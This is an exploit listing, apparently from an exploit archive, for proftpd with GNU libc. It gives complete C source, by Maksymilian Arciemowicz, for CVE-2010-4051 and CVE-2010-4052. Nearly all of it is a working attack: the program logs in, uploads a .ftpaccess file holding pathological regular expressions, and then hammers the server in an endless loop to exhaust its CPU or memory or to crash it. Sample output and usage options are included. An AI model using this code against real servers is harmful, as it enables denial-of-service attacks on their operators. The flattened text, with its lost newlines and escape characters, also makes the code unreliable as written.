proftpd multiple exploit for VU#912279 (only with GNU libc/regcomp(3))

2011-01-06 / 2011-01-07
Risk: High
Local: No
Remote: Yes

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> /* proftpd multiple exploit for VU#912279 (only with GNU libc/regcomp(3)) by Maksymilian Arciemowicz References: Tested: Ubuntu + proftpd This exploit need writing privileges to create .ftpaccess file with vulnerable regular expressions. Works well only under Linux - NetBSD 5.1 (HACKER) - Ubuntu 10.10 (TARGET) PoC1: .exitcx@cx64:~/advs/done$ ./reg1 21 cx password 1 Try create .ftpaccess with HideFiles "(.ftpaccess|(.*{10,}{10,}{10,}{10,}))$" ... send: stat . send: USER cx PASS password send: stat . Can`t connect .exit cx@cx64:~/advs/done$ telnet 21 Trying telnet: Unable to connect to remote host: Connection refused Resume: - created .ftpaccess file, and connect<=>disconnect It will create a lot of proftpd children with 100% CPU usage. If we try ./reg1 21 cx password 3 any proftpd children will generate memory exhausion Options: 1 - cpu resource exhausion 2 - crash (recursion) 3 - memory resource exhausion 4 - possible crash with (ulimit {-v|-m}) */ char expl0[]="HideFiles "(\.ftpaccess|(.*{10,}{10,}{10,}{10,}))$""; //CVE-2010-4052 Long execution char expl1[]="HideFiles "(\.ftpaccess|(.*{10,}{10,}{10,}{10,}{10,}))$""; //CVE-2010-4051 Crash char expl2[]="HideFiles "(.*+++++++++++++++++++++++++++++(\w+))""; // memory exhausion char expl3[]="HideFiles "(.*++++++++++++++++++++++++++++++(\w+))""; // if virtual memory limited, crash int sendftp(int stream,char *what){ if(-1==send(stream,what,strlen(what),0)) printf("Can't send %sn",what); else printf("send: %sn",what); bzero(what,sizeof(what)); } void readftp(int stream,int flag){ if(flag==1) flag=MSG_DONTWAIT; else flag=0; char *readline=malloc(sizeof(char)*(4096+1)); memset(readline,'x00',(4096+1)); if(recv(stream,readline,4096,flag)<1){ printf("Can't read from streamn"); if(readline) free(readline); close(stream); exit(1); } else{ if(readline) write(1, readline, strlen(readline)); fflush(stdout); } free(readline); } int attack(host,port,login,pass) char *host,*port,*login,*pass; { char buffer[1024]; // send ftp command buffor int sockfd,n,error; struct addrinfo hints; struct addrinfo *res, *res0; memset(&hints, 0, sizeof(hints)); hints.ai_family = PF_UNSPEC; hints.ai_socktype = SOCK_STREAM; error = getaddrinfo(host,port,&hints,&res0); if (error){ errorcon: printf("Can`t connectn.exit"); exit(1); } if((sockfd=socket(res0->ai_family,res0->ai_socktype,res0->ai_protocol))<0) goto errorcon; if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon; snprintf(buffer,1024,"USER %snPASS %sn",login,pass); sendftp(sockfd,buffer); bzero(buffer,1024); snprintf(buffer,1024,"STAT .n"); sendftp(sockfd,buffer); freeaddrinfo(res0); close(sockfd); } void exploreip(char *ip, int (*ipnum)[4]){ char *wsk; wsk=(char *)strtok(ip,"."); (*ipnum)[0]=atoi(wsk); wsk=(char *)strtok(NULL,"."); (*ipnum)[1]=atoi(wsk); wsk=(char *)strtok(NULL,"."); (*ipnum)[2]=atoi(wsk); wsk=(char *)strtok(NULL,"."); (*ipnum)[3]=atoi(wsk); } int createexpl(host,port,login,pass,lip,pattern) char *host,*port,*login,*pass,*lip,*pattern; { char buffer[1024]; // send ftp command buffor int ipnum[4]; int sockfd,n,error,sendstream,binarystream,sendport = (1024 + getpid()); struct addrinfo hints; struct addrinfo *res, *res0; struct sockaddr_in remo, loca; int len = sizeof(remo); memset(&hints, 0, sizeof(hints)); hints.ai_family = PF_UNSPEC; hints.ai_socktype = SOCK_STREAM; error = getaddrinfo(host,port,&hints,&res0); if (error){ errorcon: if(sendstream) close(sendstream); printf("Can`t connectn.exit"); exit(1); } if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0) goto errorcon; if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon; readftp(sockfd,1024); snprintf(buffer,1024,"USER %snPASS %sn",login,pass); sendftp(sockfd,buffer); readftp(sockfd,1024); readftp(sockfd,1024); exploreip(lip,&ipnum); snprintf(buffer,1024,"TYPE InPORT %d,%d,%d,%d,%d,%dn",ipnum[0],ipnum[1],ipnum[2],ipnum[3],sendport/256,sendport%256); sendftp(sockfd,buffer); readftp(sockfd,1024); bzero(&loca, sizeof(loca)); loca.sin_family = AF_INET; loca.sin_port=htons(sendport); loca.sin_addr.s_addr = htonl(INADDR_ANY); if((sendstream=socket(AF_INET, SOCK_STREAM,0))<0) goto errorcon; if((bind(sendstream, (struct sockaddr *) &loca, sizeof(loca)))<0) goto errorcon; if(listen(sendstream, 10) < 0) goto errorcon; snprintf(buffer,1024,"STOR .ftpaccessn"); sendftp(sockfd,buffer); readftp(sockfd,1024); if((binarystream=accept(sendstream,(struct sockaddr *)&remo,&len)) < 0) goto errorcon; write(binarystream,pattern,strlen(pattern)); freeaddrinfo(res0); close(sendstream); printf("Created .ftpaccess file with %snIt`s time to attack...n",pattern); sleep(3); return 0; } void usage(){ printf("Use: ./exploit target_ip port username password [your_ip] [option]nnCreate .ftpaccess with selected attacknoptions:n1 - Long execution CVE-2010-4052n2 - Recursion Crash CVE-2010-4051n3 - Memory exhausion n4 - Crash if virtual memory limitednn"); exit(1); } int main(int argc,char *argv[]) { char *login,*pass,*lip=NULL; char logindef[]="anonymous",passdef[]="cx@"; printf("This is exploit for ERE (GNU libc)nby Maksymilian Arciemowicznn"); if(argc<3) usage(); char *host=argv[1]; char *port=argv[2]; if(4<=argc) login=argv[3]; else login=logindef; if(5<=argc) pass=argv[4]; else pass=passdef; if(6<=argc) lip=argv[5]; if(7<=argc) switch(atoi(argv[6])){ case 1: printf("Try create .ftpaccess with %snn",expl0); createexpl(host,port,login,pass,lip,expl0); break; case 2: printf("Try create .ftpaccess with %snn",expl1); createexpl(host,port,login,pass,lip,expl1); break; case 3: printf("Try create .ftpaccess with %snn",expl2); createexpl(host,port,login,pass,lip,expl2); break; case 4: printf("Try create .ftpaccess with %snn",expl3); createexpl(host,port,login,pass,lip,expl3); break; default: usage(); break; }; while(1) attack(host,port,login,pass); return 0; // never happen }


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